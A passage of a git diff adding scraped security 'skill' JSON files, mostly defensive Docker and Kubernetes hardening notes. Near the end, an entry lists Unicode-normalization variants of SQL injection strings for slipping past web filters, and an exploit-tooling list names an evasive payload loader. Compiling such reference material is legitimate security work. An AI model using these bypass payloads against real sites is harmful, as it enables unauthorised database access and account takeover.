+ "1. **Disable Docker's built-in firewall management**: Docker includes its own firewall management, which can conflict with external firewalls like firewalld. Disable Docker's built-in firewall management by setting the `iptables` parameter in the Docker daemon configuration to \"false\". This ensures that Docker does not interfere with the external firewall rules.",
+ "2. **Configure firewall rules using firewalld**: Use firewalld or any other firewall management tool to define the desired rules for your Docker Swarm environment. Create appropriate rules to allow necessary ingress and egress traffic to and from the swarm nodes, including control plane and worker nodes.",
+ "3. **Configure the Docker daemon to use the external firewall**: Modify the Docker daemon configuration (`/etc/docker/daemon.json`) to use the external firewall rules. Add the `\"iptables\": false` option to the configuration file. This prevents Docker from altering the firewall rules, enabling the external firewall to control the network traffic.",
+ "4. **Restart the Docker daemon**: After making the changes, restart the Docker daemon to apply the updated configuration.",
+ "5. **Verify firewall rules and connectivity**: Ensure that the firewall rules are correctly applied and verify the connectivity to the Docker Swarm cluster. Test communication between nodes and services within the Swarm to ensure that the firewall rules are effectively enforced.",
+ "By disabling Docker's built-in firewall management and configuring the external firewall to handle the traffic, you can regain control over the network traffic and effectively secure your Docker Swarm installation while utilizing firewalld or any other firewall management tool of your choice.",
+ "**Note**: Docker Swarm relies on specific network ports for inter-node communication, so ensure that the necessary ports are appropriately configured in your firewall rules to allow communication within the Swarm cluster. Remember to consult the documentation and specific guides for your firewall management tool (e.g., firewalld, iptables, etc.) for detailed instructions on configuring rules and managing network traffic.",
+ "- **iptables**: iptables is a widely used and powerful firewall utility in Linux. It is a command-line tool for configuring the Linux kernel's netfilter firewall system. iptables provides extensive control over network traffic by allowing you to define rules based on IP addresses, ports, protocols, and more.",
+ "- **UFW (Uncomplicated Firewall):** UFW is a user-friendly frontend for iptables that simplifies the process of configuring a firewall. It provides an easy-to-use command-line interface and supports basic firewall operations such as allowing or blocking incoming and outgoing traffic based on port numbers or application profiles.",
+ "- **nftables:** nftables is the successor to iptables and provides a more modern and flexible framework for packet filtering and network address translation (NAT) in Linux. nftables allows you to define firewall rules using a more streamlined syntax and offers improved performance compared to iptables.",
+ "Here are the documentation links for iptables, UFW, and nftables:",
+ "1. **iptables**:",
+ "- [iptables Tutorial](https://www.netfilter.org/documentation/index.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/docker/docker-swarm-firewalls.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_965126d2e425.json b/skills/docker_and_k8s_security_965126d2e425.json
new file mode 100644
index 0000000..f5c8db2
--- /dev/null
+++ b/skills/docker_and_k8s_security_965126d2e425.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_965126d2e425",
+ "category": "docker-and-k8s-security",
+ "title": "container technology concepts",
+ "description": "# Container Technology Concepts\n\nContainer technologies have become an important part of modern software development, providing a lightweight and portable way to package and deploy applications. Here are some of the prominent container technologies:\n\n### Docker\nDocker is the most widely known and used container platform. It simplifies the creation, deployment, and running of applications by using containers. Docker packages software into standardized units for development, shipment, and deployme",
+ "payloads": [
+ "# Container Technology Concepts",
+ "Container technologies have become an important part of modern software development, providing a lightweight and portable way to package and deploy applications. Here are some of the prominent container technologies:",
+ "### Docker",
+ "Docker is the most widely known and used container platform. It simplifies the creation, deployment, and running of applications by using containers. Docker packages software into standardized units for development, shipment, and deployment, making it easier to manage and scale applications across different environments[2][3].",
+ "### LXC (Linux Containers)",
+ "LXC is an open-source project that provides isolated application environments similar to virtual machines but without the overhead of running their own kernel. LXC allows multiple processes to run within a container and is managed without a central daemon, differing from Docker's single-process-per-container approach[2][3].",
+ "### CRI-O",
+ "CRI-O is an implementation of the Kubernetes Container Runtime Interface (CRI) to enable using Open Container Initiative (OCI) compatible runtimes. It aims to replace Docker as the container engine for Kubernetes, allowing Kubernetes to use any OCI-compliant runtime for running pods[2][3].",
+ "### rkt (Rocket)",
+ "rkt is an application container engine designed for building modern cloud-native applications. It focuses on security improvements and is often used in conjunction with other technologies or as specific components of a Docker-based system[2][3].",
+ "### Podman",
+ "Podman is an open-source container engine that allows users to manage containers without requiring a daemon. It is compatible with Docker and can run containers as rootless, enhancing security by not requiring root privileges[1].",
+ "### containerd",
+ "containerd is an industry-standard core container runtime that manages the complete container lifecycle of its host system, from image transfer and storage to container execution and supervision. It is used by Docker and Kubernetes as their container runtime[2].",
+ "### Buildah"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/docker/container_technology_concepts.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_9ee69e51ac08.json b/skills/docker_and_k8s_security_9ee69e51ac08.json
new file mode 100644
index 0000000..10b01c0
--- /dev/null
+++ b/skills/docker_and_k8s_security_9ee69e51ac08.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_9ee69e51ac08",
+ "category": "docker-and-k8s-security",
+ "title": "podman vs docker",
+ "description": "# Podman vs Docker\n\n- Docker uses a daemon, an ongoing program running in the background, to create images and run containers.\n- Podman has a daemon-less architecture\u00a0which means it can run containers under the user starting the container. \n- Docker has a client-server logic mediated by a daemon; Podman does not need the mediator.\n- Podman allows for non-root privileges for containers.\n- Rootless containers are considered safer than containers with root privileges\n\n## Podman Rootless?\n\n- Contain",
+ "payloads": [
+ "# Podman vs Docker",
+ "- Docker uses a daemon, an ongoing program running in the background, to create images and run containers.",
+ "- Podman has a daemon-less architecture\u00a0which means it can run containers under the user starting the container.",
+ "- Docker has a client-server logic mediated by a daemon; Podman does not need the mediator.",
+ "- Podman allows for non-root privileges for containers.",
+ "- Rootless containers are considered safer than containers with root privileges",
+ "## Podman Rootless?",
+ "- Containers in Podman do not have root access by default, adding a natural barrier between root and rootless levels, improving security.",
+ "- Still, Podman can run both root and rootless containers.",
+ "## What about Systemd?",
+ "- Without a daemon, Podman needs another tool to manage services and support running containers in the background.",
+ "- Systemd creates control units for existing containers or to generate new ones.",
+ "- Systemd can also be integrated with Podman allowing it to run containers with systemd enabled by default, without any modification.",
+ "- By using systemd, vendors can install, run, and manage their applications as containers since most are now exclusively packaged and delivered this way.",
+ "## Building images"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/podman_vs_docker.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_c9e28803a452.json b/skills/docker_and_k8s_security_c9e28803a452.json
new file mode 100644
index 0000000..6f4ae86
--- /dev/null
+++ b/skills/docker_and_k8s_security_c9e28803a452.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_c9e28803a452",
+ "category": "docker-and-k8s-security",
+ "title": "seccomp",
+ "description": "# SECCOMP\nTo use seccomp (Secure Computing Mode) with Docker, you can follow these steps:\n\n1. Enable seccomp in the Docker daemon:\n - Open the Docker daemon configuration file, typically located at `/etc/docker/daemon.json`.\n - Add the following configuration to enable seccomp:\n ```json\n {\n \"seccomp-profiles\": [\n {\n \"name\": \"default\",\n \"path\": \"/path/to/seccomp/profile.json\"\n }\n ]\n }\n ```\n Replace `/path/to/seccomp/profile.j",
+ "payloads": [
+ "# SECCOMP",
+ "To use seccomp (Secure Computing Mode) with Docker, you can follow these steps:",
+ "1. Enable seccomp in the Docker daemon:",
+ "- Open the Docker daemon configuration file, typically located at `/etc/docker/daemon.json`.",
+ "- Add the following configuration to enable seccomp:",
+ "```json",
+ "\"seccomp-profiles\": [",
+ "\"name\": \"default\",",
+ "\"path\": \"/path/to/seccomp/profile.json\"",
+ "Replace `/path/to/seccomp/profile.json` with the actual path to your seccomp profile JSON file.",
+ "- Save the configuration file and restart the Docker daemon to apply the changes.",
+ "2. Create a seccomp profile JSON file:",
+ "- Create a JSON file that defines the seccomp profile for your Docker containers. This file specifies the system calls that are allowed or denied within the container.",
+ "- You can create your own custom seccomp profile or use an existing profile as a starting point. There are various sources available for seccomp profiles, such as the Docker seccomp repository on GitHub, which provides pre-defined profiles for common use cases.",
+ "- Define the desired system calls and their corresponding actions (allow or deny) in the JSON file."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/docker/seccomp.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_cb73d072da00.json b/skills/docker_and_k8s_security_cb73d072da00.json
new file mode 100644
index 0000000..5c8f2ed
--- /dev/null
+++ b/skills/docker_and_k8s_security_cb73d072da00.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_cb73d072da00",
+ "category": "docker-and-k8s-security",
+ "title": "GKE",
+ "description": "# Google Kubernetes Engine (GKE)\nThe following are security best practices for Google Kubernetes Engine (GKE) along with reference links for further information:\n\n| Best Practice | Reference Links |\n|---------",
+ "payloads": [
+ "# Google Kubernetes Engine (GKE)",
+ "The following are security best practices for Google Kubernetes Engine (GKE) along with reference links for further information:",
+ "| Best Practice | Reference Links |",
+ "|-----------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|",
+ "| Implement cluster isolation | [GKE Documentation - Isolating Clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-organization) |",
+ "| Use IAM for authentication and authorization | [GKE Documentation - Identity and Access Management](https://cloud.google.com/kubernetes-engine/docs/how-to/iam-integration) |",
+ "| Secure the GKE API server | [GKE Documentation - Securing the Kubernetes API Server](https://cloud.google.com/kubernetes-engine/docs/how-to/api-server-security) |",
+ "| Apply security best practices to worker nodes | [GKE Documentation - Hardening Your Cluster's Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster-nodes) |",
+ "| Implement network security | [GKE Documentation - Network Security](https://cloud.google.com/kubernetes-engine/docs/how-to/network-policy) |",
+ "| Enable logging and monitoring | [GKE Documentation - Logging and Monitoring](https://cloud.google.com/kubernetes-engine/docs/how-to/logging) |",
+ "| Implement encryption at rest and in transit | [GKE Documentation - Encryption at Rest](https://cloud.google.com/kubernetes-engine/docs/how-to/encrypting-secrets) |",
+ "| Implement vulnerability management | [GKE Documentation - Security Best Practices](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-security) |",
+ "| Establish disaster recovery and backup strategies | [GKE Documentation - Backup and Restore](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-backup) |",
+ "| Perform security auditing and compliance assessments | [GKE Documentation - Security Overview](https://cloud.google.com/kubernetes-engine/docs/concepts/security-overview) |",
+ "These reference links will provide you with detailed information and guidelines for implementing each best practice in securing your GKE cluster."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/GKE.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_d040532e2841.json b/skills/docker_and_k8s_security_d040532e2841.json
new file mode 100644
index 0000000..00cb46e
--- /dev/null
+++ b/skills/docker_and_k8s_security_d040532e2841.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_d040532e2841",
+ "category": "docker-and-k8s-security",
+ "title": "docker swarm firewalls",
+ "description": "# Docker Swarm and Linux Firewall Implementations\n\nBy default, Docker Swarm uses an overlay network that encapsulates network traffic, making it difficult for firewall rules to filter or control the traffic. To handle this problem and enforce firewall rules effectively in a Docker Swarm environment, you can follow these steps:\n\n1. **Disable Docker's built-in firewall management**: Docker includes its own firewall management, which can conflict with external firewalls like firewalld. Disable Dock",
+ "payloads": [
+ "# Docker Swarm and Linux Firewall Implementations",
+ "By default, Docker Swarm uses an overlay network that encapsulates network traffic, making it difficult for firewall rules to filter or control the traffic. To handle this problem and enforce firewall rules effectively in a Docker Swarm environment, you can follow these steps:",
+ "1. **Disable Docker's built-in firewall management**: Docker includes its own firewall management, which can conflict with external firewalls like firewalld. Disable Docker's built-in firewall management by setting the `iptables` parameter in the Docker daemon configuration to \"false\". This ensures that Docker does not interfere with the external firewall rules.",
+ "2. **Configure firewall rules using firewalld**: Use firewalld or any other firewall management tool to define the desired rules for your Docker Swarm environment. Create appropriate rules to allow necessary ingress and egress traffic to and from the swarm nodes, including control plane and worker nodes.",
+ "3. **Configure the Docker daemon to use the external firewall**: Modify the Docker daemon configuration (`/etc/docker/daemon.json`) to use the external firewall rules. Add the `\"iptables\": false` option to the configuration file. This prevents Docker from altering the firewall rules, enabling the external firewall to control the network traffic.",
+ "4. **Restart the Docker daemon**: After making the changes, restart the Docker daemon to apply the updated configuration.",
+ "5. **Verify firewall rules and connectivity**: Ensure that the firewall rules are correctly applied and verify the connectivity to the Docker Swarm cluster. Test communication between nodes and services within the Swarm to ensure that the firewall rules are effectively enforced.",
+ "By disabling Docker's built-in firewall management and configuring the external firewall to handle the traffic, you can regain control over the network traffic and effectively secure your Docker Swarm installation while utilizing firewalld or any other firewall management tool of your choice.",
+ "**Note**: Docker Swarm relies on specific network ports for inter-node communication, so ensure that the necessary ports are appropriately configured in your firewall rules to allow communication within the Swarm cluster. Remember to consult the documentation and specific guides for your firewall management tool (e.g., firewalld, iptables, etc.) for detailed instructions on configuring rules and managing network traffic.",
+ "- **iptables**: iptables is a widely used and powerful firewall utility in Linux. It is a command-line tool for configuring the Linux kernel's netfilter firewall system. iptables provides extensive control over network traffic by allowing you to define rules based on IP addresses, ports, protocols, and more.",
+ "- **UFW (Uncomplicated Firewall):** UFW is a user-friendly frontend for iptables that simplifies the process of configuring a firewall. It provides an easy-to-use command-line interface and supports basic firewall operations such as allowing or blocking incoming and outgoing traffic based on port numbers or application profiles.",
+ "- **nftables:** nftables is the successor to iptables and provides a more modern and flexible framework for packet filtering and network address translation (NAT) in Linux. nftables allows you to define firewall rules using a more streamlined syntax and offers improved performance compared to iptables.",
+ "Here are the documentation links for iptables, UFW, and nftables:",
+ "1. **iptables**:",
+ "- [iptables Tutorial](https://www.netfilter.org/documentation/index.html)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/docker/docker-swarm-firewalls.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_d718b58966b9.json b/skills/docker_and_k8s_security_d718b58966b9.json
new file mode 100644
index 0000000..8c9937f
--- /dev/null
+++ b/skills/docker_and_k8s_security_d718b58966b9.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_d718b58966b9",
+ "category": "docker-and-k8s-security",
+ "title": "secrets",
+ "description": "# Kubernetes Secrets\nWhile Kubernetes Secrets provide a convenient way to manage sensitive information within a Kubernetes cluster, there are alternative solutions that you can consider based on your specific requirements:\n\n1. **External Secrets Management Systems**:\n - Use external secrets management systems such as HashiCorp Vault or Azure Key Vault.\n - These systems provide enhanced security features, centralized management, and fine-grained access control for secrets.\n - Kubernetes can",
+ "payloads": [
+ "# Kubernetes Secrets",
+ "While Kubernetes Secrets provide a convenient way to manage sensitive information within a Kubernetes cluster, there are alternative solutions that you can consider based on your specific requirements:",
+ "1. **External Secrets Management Systems**:",
+ "- Use external secrets management systems such as HashiCorp Vault or Azure Key Vault.",
+ "- These systems provide enhanced security features, centralized management, and fine-grained access control for secrets.",
+ "- Kubernetes can integrate with these systems through plugins or custom controllers to fetch secrets during runtime.",
+ "2. **Configuration Management Tools**:",
+ "- Leverage configuration management tools like Ansible, Puppet, or Chef to manage and distribute secrets to Kubernetes clusters.",
+ "- These tools offer more advanced features for secret rotation, versioning, and auditing.",
+ "- Secrets can be encrypted and securely stored in the configuration management system, and then retrieved during deployment or runtime.",
+ "3. **Encrypted Environment Variables**:",
+ "- Instead of using Kubernetes Secrets, you can encrypt sensitive information and store them as environment variables within the Pod specification.",
+ "- Encryption can be achieved using tools like SOPS or using built-in encryption capabilities of your deployment automation or configuration management tool.",
+ "4. **External Key Management Services**:",
+ "- Utilize external key management services like AWS Key Management Service (KMS) or Google Cloud Key Management Service (KMS) for managing encryption keys."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/kubernetes/secrets.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_e2b78b085038.json b/skills/docker_and_k8s_security_e2b78b085038.json
new file mode 100644
index 0000000..98421df
--- /dev/null
+++ b/skills/docker_and_k8s_security_e2b78b085038.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_e2b78b085038",
+ "category": "docker-and-k8s-security",
+ "title": "additional tools",
+ "description": "# Additional Docker Security Tools and Resources\n\n- [Anchor Engine](https://github.com/anchore/anchore) - Analyze images for CVE vulnerabilities and against custom security policies by [@Anchor](https://github.com/anchore)\n- [Aqua Security](https://www.aquasec.com) :heavy_dollar_sign: - Securing container-based applications from Dev to Production on any platform\n- [bane](https://github.com/genuinetools/bane) - AppArmor profile generator for Docker containers by [@genuinetools][genuinetools]\n- [C",
+ "payloads": [
+ "# Additional Docker Security Tools and Resources",
+ "- [Anchor Engine](https://github.com/anchore/anchore) - Analyze images for CVE vulnerabilities and against custom security policies by [@Anchor](https://github.com/anchore)",
+ "- [Aqua Security](https://www.aquasec.com) :heavy_dollar_sign: - Securing container-based applications from Dev to Production on any platform",
+ "- [bane](https://github.com/genuinetools/bane) - AppArmor profile generator for Docker containers by [@genuinetools][genuinetools]",
+ "- [CIS Docker Benchmark](https://github.com/dev-sec/cis-docker-benchmark) - This [InSpec][inspec] compliance profile implement the CIS Docker 1.12.0 Benchmark in an automated way to provide security best-practice tests around Docker daemon and containers in a production environment. By [@dev-sec](https://github.com/dev-sec)",
+ "- [Clair](https://github.com/quay/clair) - Clair is an open source project for the static analysis of vulnerabilities in appc and docker containers. By [@coreos][coreos]",
+ "- [Dagda](https://github.com/eliasgranderubio/dagda) - Dagda is a tool to perform static analysis of known vulnerabilities, trojans, viruses, malware & other malicious threats in docker images/containers and to monitor the docker daemon and running docker containers for detecting anomalous activities. By [@eliasgranderubio](https://github.com/eliasgranderubio)",
+ "- [Deepfence SecretScanner](https://github.com/deepfence/SecretScanner) - Find unprotected secrets - tokens, keys, passwords - in containers and host filesystems.",
+ "- [Deepfence ThreatMapper](https://github.com/deepfence/ThreatMapper) - Powerful open source runtime vulnerability scanner for kubernetes, virtual machines and serverless.",
+ "- [Deepfence ThreatStryker](https://deepfence.io/threatstryker/) :heavy_dollar_sign: - Full life cycle Cloud Native Workload Protection platform for kubernetes, virtual machines and serverless. By [@deepfence](deepfence)",
+ "- [docker-bench-security](https://github.com/docker/docker-bench-security) - script that checks for dozens of common best-practices around deploying Docker containers in production.",
+ "- [docker-explorer](https://github.com/google/docker-explorer) - A tool to help forensicate offline docker acquisitions by Google",
+ "- [docker-lock](https://github.com/safe-waters/docker-lock) - A cli-plugin for docker to automatically manage image digests by tracking them in a separate Lockfile. By [@safe-waters][safe-waters]",
+ "- [notary](https://github.com/theupdateframework/notary) - a server and a client for running and interacting with trusted collections.",
+ "- [oscap-docker](https://github.com/OpenSCAP/openscap) - OpenSCAP provides oscap-docker tool which is used to scan Docker containers and images. By [OpenSCAP](https://github.com/OpenSCAP)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/temp/Ethical_Hacking/Attacks_and_Exploits/Cloud_Attacks/docker-and-k8s-security/docker/additional-tools.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docker_and_k8s_security_ee0e4b8205bd.json b/skills/docker_and_k8s_security_ee0e4b8205bd.json
new file mode 100644
index 0000000..80097ea
--- /dev/null
+++ b/skills/docker_and_k8s_security_ee0e4b8205bd.json
@@ -0,0 +1,27 @@
+{
+ "id": "docker_and_k8s_security_ee0e4b8205bd",
+ "category": "docker-and-k8s-security",
+ "title": "audit docker",
+ "description": "# Audit Rules in Docker\nIn Docker, audit rules are used to monitor and log various activities within the Docker environment. They provide a way to track and record important events related to containers, images, networks, and other Docker components. By setting up audit rules, you can gain visibility into the actions and operations performed within the Docker ecosystem.\n\nAudit rules are typically configured using the Docker daemon's audit log feature, which utilizes the Linux audit framework. Th",
+ "payloads": [
+ "# Audit Rules in Docker",
+ "In Docker, audit rules are used to monitor and log various activities within the Docker environment. They provide a way to track and record important events related to containers, images, networks, and other Docker components. By setting up audit rules, you can gain visibility into the actions and operations performed within the Docker ecosystem.",
+ "Audit rules are typically configured using the Docker daemon's audit log feature, which utilizes the Linux audit framework. The audit framework allows you to define specific conditions or events to be monitored and logged.",
+ "Here are some common use cases and benefits of using audit rules in Docker:",
+ "1. Security Monitoring: Audit rules help in detecting and investigating potential security breaches or suspicious activities within the Docker environment. By monitoring specific events such as container creations, image pulls, network connections, or file access, you can identify unauthorized or malicious activities.",
+ "2. Compliance and Governance: Audit rules assist in meeting compliance requirements and maintaining proper governance. They help demonstrate that security policies, access controls, and operational procedures are being followed. Audit logs can be useful for audits, incident response, and forensic investigations.",
+ "3. Troubleshooting and Diagnostics: Audit logs provide valuable insights when troubleshooting issues within the Docker environment. By capturing events related to container start/stop, network connectivity, or resource usage, you can identify problematic areas and diagnose the root cause of problems.",
+ "4. Operational Insights: Audit rules offer visibility into various operational aspects of Docker, such as user actions, changes to configurations, or resource allocations. This information can be leveraged for capacity planning, resource optimization, and overall operational improvements.",
+ "When setting up audit rules in Docker, you can define specific events to be logged based on criteria such as user identities, object types (containers, images), operations (create, start, stop), and other attributes. The rules can be configured using the `audit.json` file, which specifies the events and conditions to monitor.",
+ "Make sure to have a balance between the level of detail in audit logging and the impact on system performance and log storage. You should carefully select the events to monitor based on your specific needs and operational requirements.",
+ "## Example",
+ "1. Enable Audit Logging:",
+ "- Open the Docker daemon configuration file, typically located at `/etc/docker/daemon.json`.",
+ "- Add the following configuration to enable audit logging:",
+ "```json"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docker-and-k8s-security/docker/audit-docker.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docs_1fba27ecc518.json b/skills/docs_1fba27ecc518.json
new file mode 100644
index 0000000..dcbcbc1
--- /dev/null
+++ b/skills/docs_1fba27ecc518.json
@@ -0,0 +1,27 @@
+{
+ "id": "docs_1fba27ecc518",
+ "category": "docs",
+ "title": "TROUBLESHOOTING",
+ "description": "# Troubleshooting Guide\n\nThis document describes common edge-cases and workarounds for checking links to various sites. \\\nPlease add your own findings and send us a pull request if you can.\n\n## GitHub Rate Limiting\n\nGitHub has a quite aggressive rate limiter. \\\nIf you're seeing errors like:\n\n```\nGitHub token not specified. To check GitHub links reliably, use `--github-token` flag / `GITHUB_TOKEN` env var.\n```\n\nThat means you're getting rate-limited. As per the message, you can make lychee \\\nuse ",
+ "payloads": [
+ "# Troubleshooting Guide",
+ "This document describes common edge-cases and workarounds for checking links to various sites. \\",
+ "Please add your own findings and send us a pull request if you can.",
+ "## GitHub Rate Limiting",
+ "GitHub has a quite aggressive rate limiter. \\",
+ "If you're seeing errors like:",
+ "GitHub token not specified. To check GitHub links reliably, use `--github-token` flag / `GITHUB_TOKEN` env var.",
+ "That means you're getting rate-limited. As per the message, you can make lychee \\",
+ "use a GitHub personal access token to circumvent this.",
+ "For more details, see [\"GitHub token\" section in README.md](https://github.com/lycheeverse/lychee#github-token).",
+ "## Too Many Open Files",
+ "The number of concurrent network requests (`MAX_CONCURRENCY`) is set to 128 by default.",
+ "Every network request maps to an open socket, which is represented as a file on UNIX systems.",
+ "If you see error messages like \"error trying to connect: tcp open error: Too",
+ "many open files (os error 24)\" then you ran out of file handles."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docs/TROUBLESHOOTING.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/docs_b77ed881e5fa.json b/skills/docs_b77ed881e5fa.json
new file mode 100644
index 0000000..e5fff20
--- /dev/null
+++ b/skills/docs_b77ed881e5fa.json
@@ -0,0 +1,27 @@
+{
+ "id": "docs_b77ed881e5fa",
+ "category": "docs",
+ "title": "PRE COMMIT",
+ "description": "# Lychee Pre-commit Hooks\n\nThis repository provides three pre-commit hook options for lychee link checking:\n\n## Quick Start\n\nAdd this to your `.pre-commit-config.yaml`:\n\n```yaml\nrepos:\n - repo: https://github.com/lycheeverse/lychee\n rev: lychee-v0.20.1 # Use latest lychee-v* tag\n hooks:\n - id: lychee # Auto-installs lychee\n```\n\n## Hook Options\n\n### 1. `lychee` (Recommended)\n\n- **Auto-installs** lychee using cargo-binstall (fast) or cargo install (fallback)\n- **Best user experience*",
+ "payloads": [
+ "# Lychee Pre-commit Hooks",
+ "This repository provides three pre-commit hook options for lychee link checking:",
+ "## Quick Start",
+ "Add this to your `.pre-commit-config.yaml`:",
+ "```yaml",
+ "repos:",
+ "- repo: https://github.com/lycheeverse/lychee",
+ "rev: lychee-v0.20.1 # Use latest lychee-v* tag",
+ "hooks:",
+ "- id: lychee # Auto-installs lychee",
+ "## Hook Options",
+ "### 1. `lychee` (Recommended)",
+ "- **Auto-installs** lychee using cargo-binstall (fast) or cargo install (fallback)",
+ "- **Best user experience** - no manual setup required",
+ "- **Fast** - uses pre-built binaries when available"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/docs/PRE_COMMIT.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/encoding_transformations-0f75b84b6347.json b/skills/encoding_transformations-0f75b84b6347.json
new file mode 100644
index 0000000..cc569ff
--- /dev/null
+++ b/skills/encoding_transformations-0f75b84b6347.json
@@ -0,0 +1,23 @@
+{
+ "id": "encoding_transformations-0f75b84b6347",
+ "category": "ENCODING_TRANSFORMATIONS",
+ "title": "README",
+ "description": "# Encoding and Transformations\n\n> Encoding and Transformations are techniques that change how data is represented or transferred without altering its core meaning. Common examples include URL encoding, Base64, HTML entity encoding, and Unicode transformations. Attackers use these methods as gadgets to bypass input filters, evade web application firewalls, or break out of sanitization routines.\n\n## Summary\n\n* [Unicode](#unicode)\n * [Unicode Normalization](#unicode-normalization)\n * [Punycod",
+ "payloads": [
+ "[Unicode Normalization reference table](https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html)",
+ "| `\uff07` (U+FF07) | `\uff07 or \uff071\uff07=\uff071` | `' or '1'='1` |",
+ "| `\uff02` (U+FF02) | `\uff02 or \uff021\uff02=\uff021` | `\" or \"1\"=\"1` |",
+ "| `\uff1c` (U+FF1C) | `\uff1cimg src=a\uff1e` | `` |",
+ "* [NahamCon - Puny-Code: 0-Click Account Takeover](https://github.com/VoorivexTeam/white-box-challenges/tree/main/punycode)",
+ "* [PentesterLab - Unicode and NFKC](https://pentesterlab.com/exercises/unicode-transform)",
+ "* [Puny-Code, 0-Click Account Takeover - Voorivex - June 1, 2025](https://blog.voorivex.team/puny-code-0-click-account-takeover)",
+ "* [Unicode normalization vulnerabilities - Lazar - September 30, 2021](https://lazarv.com/posts/unicode-normalization-vulnerabilities/)",
+ "* [Unicode Normalization Vulnerabilities & the Special K Polyglot - AppCheck - September 2, 2019](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)",
+ "* [WAF Bypassing with Unicode Compatibility - Jorge Lajara - February 19, 2020](https://jlajara.gitlab.io/Bypass_WAF_Unicode)",
+ "* [When \"Zo\u00eb\" !== \"Zo\u00eb\". Or why you need to normalize Unicode strings - Alessandro Segala - March 11, 2019](https://withblue.ink/2019/03/11/why-you-need-to-normalize-unicode-strings.html)"
+ ],
+ "references": [
+ "PayloadsAllTheThings/Encoding Transformations/README.md"
+ ],
+ "source": "PayloadsAllTheThings"
+}
\ No newline at end of file
diff --git a/skills/exploit_development_9fd1c862ba2b.json b/skills/exploit_development_9fd1c862ba2b.json
new file mode 100644
index 0000000..1b660ee
--- /dev/null
+++ b/skills/exploit_development_9fd1c862ba2b.json
@@ -0,0 +1,27 @@
+{
+ "id": "exploit_development_9fd1c862ba2b",
+ "category": "exploit-development",
+ "title": "tools",
+ "description": "# Exploit Development Tools\n\nThis is a curated list of tools for this category.\n\n---\n\n- [403Fuzzer - Fuzz 403/401Ing Endpoints For Bypasses](http://feedproxy.google.com/~r/PentestTools/~3/Ac5hGOY7bL8/403fuzzer-fuzz-403401ing-endpoints-for.html)\n- [ADBSploit - A Python Based Tool For Exploiting And Managing Android Devices Via ADB](http://feedproxy.google.com/~r/PentestTools/~3/aWZQxx87ZOQ/adbsploit-python-based-tool-for.html)\n- [ADFSRelay - Proof Of Concept Utilities Developed To Research NTLM R",
+ "payloads": [
+ "# Exploit Development Tools",
+ "This is a curated list of tools for this category.",
+ "- [403Fuzzer - Fuzz 403/401Ing Endpoints For Bypasses](http://feedproxy.google.com/~r/PentestTools/~3/Ac5hGOY7bL8/403fuzzer-fuzz-403401ing-endpoints-for.html)",
+ "- [ADBSploit - A Python Based Tool For Exploiting And Managing Android Devices Via ADB](http://feedproxy.google.com/~r/PentestTools/~3/aWZQxx87ZOQ/adbsploit-python-based-tool-for.html)",
+ "- [ADFSRelay - Proof Of Concept Utilities Developed To Research NTLM Relaying Attacks Targeting ADFS](http://www.kitploit.com/2022/12/adfsrelay-proof-of-concept-utilities.html)",
+ "- [ADenum - A Pentesting Tool That Allows To Find Misconfiguration Through The The Protocol LDAP And Exploit Some Of Those Weaknesses With Kerberos](http://www.kitploit.com/2021/12/adenum-pentesting-tool-that-allows-to.html)",
+ "- [AFLTriage - Tool To Triage Crashing Input Files Using A Debugger](http://www.kitploit.com/2021/12/afltriage-tool-to-triage-crashing-input.html)",
+ "- [APCLdr - Payload Loader With Evasion Features](http://www.kitploit.com/2023/03/apcldr-payload-loader-with-evasion.html)",
